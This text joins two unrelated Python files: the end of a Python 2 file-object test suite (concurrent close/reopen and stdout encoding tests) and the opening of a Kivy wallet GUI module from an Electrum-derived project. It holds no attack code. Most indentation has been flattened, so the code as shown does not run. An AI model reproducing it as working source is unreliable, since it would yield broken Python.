self.fail("readlines() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
# Reading after iteration hit EOF shouldn't hurt either
f = open(TESTFN)
try:
for line in f:
pass
try:
f.readline()
f.readinto(buf)
f.read()
f.readlines()
except ValueError:
self.fail("read* failed after next() consumed file")
finally:
f.close()
finally:
os.unlink(TESTFN)
class FileSubclassTests(unittest.TestCase):
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testExit(self):
# test that exiting with context calls subclass' close
class C(file):
def __init__(self, *args):
self.subclass_closed = False
file.__init__(self, *args)
def close(self):
self.subclass_closed = True
file.close(self)
with C(TESTFN, 'w') as f:
pass
self.assertTrue(f.subclass_closed)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FileThreadingTests(unittest.TestCase):
# These tests check the ability to call various methods of file objects
# (including close()) concurrently without crashing the Python interpreter.
# See #815646, #595601
def setUp(self):
self._threads = test_support.threading_setup()
self.f = None
self.filename = TESTFN
with open(self.filename, "w") as f:
f.write("\n".join("0123456789"))
self._count_lock = threading.Lock()
self.close_count = 0
self.close_success_count = 0
self.use_buffering = False
def tearDown(self):
if self.f:
try:
self.f.close()
except (EnvironmentError, ValueError):
pass
try:
os.remove(self.filename)
except EnvironmentError:
pass
test_support.threading_cleanup(*self._threads)
def _create_file(self):
if self.use_buffering:
self.f = open(self.filename, "w+", buffering=1024*16)
else:
self.f = open(self.filename, "w+")
def _close_file(self):
with self._count_lock:
self.close_count += 1
self.f.close()
with self._count_lock:
self.close_success_count += 1
def _close_and_reopen_file(self):
self._close_file()
        # if close raises an exception that's fine, self.f remains valid so
# we don't need to reopen.
self._create_file()
def _run_workers(self, func, nb_workers, duration=0.2):
with self._count_lock:
self.close_count = 0
self.close_success_count = 0
self.do_continue = True
threads = []
try:
for i in range(nb_workers):
t = threading.Thread(target=func)
t.start()
threads.append(t)
for _ in xrange(100):
time.sleep(duration/100)
with self._count_lock:
if self.close_count-self.close_success_count > nb_workers+1:
if test_support.verbose:
print 'Q',
break
time.sleep(duration)
finally:
self.do_continue = False
for t in threads:
t.join()
def _test_close_open_io(self, io_func, nb_workers=5):
def worker():
self._create_file()
funcs = itertools.cycle((
lambda: io_func(),
lambda: self._close_and_reopen_file(),
))
for f in funcs:
if not self.do_continue:
break
try:
f()
except (IOError, ValueError):
pass
self._run_workers(worker, nb_workers)
if test_support.verbose:
            # Useful verbose statistics when tuning this test to take
            # less time to run while still ensuring that it's useful.
#
# the percent of close calls that raised an error
percent = 100. - 100.*self.close_success_count/self.close_count
print self.close_count, ('%.4f ' % percent),
def test_close_open(self):
def io_func():
pass
self._test_close_open_io(io_func)
def test_close_open_flush(self):
def io_func():
self.f.flush()
self._test_close_open_io(io_func)
def test_close_open_iter(self):
def io_func():
list(iter(self.f))
self._test_close_open_io(io_func)
def test_close_open_isatty(self):
def io_func():
self.f.isatty()
self._test_close_open_io(io_func)
def test_close_open_print(self):
def io_func():
print >> self.f, ''
self._test_close_open_io(io_func)
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def test_close_open_print_buffered(self):
self.use_buffering = True
def io_func():
print >> self.f, ''
self._test_close_open_io(io_func)
def test_close_open_read(self):
def io_func():
self.f.read(0)
self._test_close_open_io(io_func)
def test_close_open_readinto(self):
def io_func():
a = array('c', 'xxxxx')
self.f.readinto(a)
self._test_close_open_io(io_func)
def test_close_open_readline(self):
def io_func():
self.f.readline()
self._test_close_open_io(io_func)
def test_close_open_readlines(self):
def io_func():
self.f.readlines()
self._test_close_open_io(io_func)
def test_close_open_seek(self):
def io_func():
self.f.seek(0, 0)
self._test_close_open_io(io_func)
def test_close_open_tell(self):
def io_func():
self.f.tell()
self._test_close_open_io(io_func)
def test_close_open_truncate(self):
def io_func():
self.f.truncate()
self._test_close_open_io(io_func)
def test_close_open_write(self):
def io_func():
self.f.write('')
self._test_close_open_io(io_func)
def test_close_open_writelines(self):
def io_func():
self.f.writelines('')
self._test_close_open_io(io_func)
class StdoutTests(unittest.TestCase):
def test_move_stdout_on_write(self):
# Issue 3242: sys.stdout can be replaced (and freed) during a
# print statement; prevent a segfault in this case
save_stdout = sys.stdout
class File:
def write(self, data):
if '\n' in data:
sys.stdout = save_stdout
try:
sys.stdout = File()
print "some text"
finally:
sys.stdout = save_stdout
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def test_del_stdout_before_print(self):
# Issue 4597: 'print' with no argument wasn't reporting when
# sys.stdout was deleted.
save_stdout = sys.stdout
del sys.stdout
try:
print
except RuntimeError as e:
self.assertEqual(str(e), "lost sys.stdout")
else:
self.fail("Expected RuntimeError")
finally:
sys.stdout = save_stdout
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def test_unicode(self):
import subprocess
def get_message(encoding, *code):
code = '\n'.join(code)
env = os.environ.copy()
env['PYTHONIOENCODING'] = encoding
process = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 0)
return stdout
def check_message(text, encoding, expected):
stdout = get_message(encoding,
"import sys",
"sys.stdout.write(%r)" % text,
"sys.stdout.flush()")
self.assertEqual(stdout, expected)
# test the encoding
check_message(u'15\u20ac', "iso-8859-15", "15\xa4")
check_message(u'15\u20ac', "utf-8", '15\xe2\x82\xac')
check_message(u'15\u20ac', "utf-16-le", '1\x005\x00\xac\x20')
# test the error handler
check_message(u'15\u20ac', "iso-8859-1:ignore", "15")
check_message(u'15\u20ac', "iso-8859-1:replace", "15?")
check_message(u'15\u20ac', "iso-8859-1:backslashreplace", "15\\u20ac")
# test the buffer API
for objtype in ('buffer', 'bytearray'):
stdout = get_message('ascii',
'import sys',
r'sys.stdout.write(%s("\xe9"))' % objtype,
'sys.stdout.flush()')
self.assertEqual(stdout, "\xe9")
def test_main():
# Historically, these tests have been sloppy about removing TESTFN.
# So get rid of it no matter what.
try:
run_unittest(AutoFileTests, OtherFileTests, FileSubclassTests,
FileThreadingTests, StdoutTests)
finally:
if os.path.exists(TESTFN):
os.unlink(TESTFN)
if __name__ == '__main__':
test_main()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.wallet import update_password_for_directory
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from electrum.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register a widget cache to keep memory usage down; a timeout of 0 means
# the data is cached forever
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
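        # The polled callback returns True to keep the 0.1s Clock interval alive
        # while no wallet is loaded; once a wallet exists it switches to the 'send'
        # tab (so the screen gets built) and keeps polling until self.send_screen
        # is set, then calls func once and returns False, unscheduling the interval.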
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME:
self.set_URI(data)
elif scheme == LIGHTNING_URI_SCHEME:
self.set_ln_invoice(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
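    # Worked example (hypothetical amounts, assuming decimal_point() == 8 so the
    # base unit is the whole coin): get_amount("0.5 " + base_unit) returns
    # int(10**8 * Decimal("0.5")) == 50000000 satoshis; btc_to_fiat() then
    # multiplies by the exchange rate and divides by 10**8 to express it in fiat.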
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''The orientation of the main window. Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so as to throttle updates to at most 2 per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum_bte.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitweb: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the basic
        tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
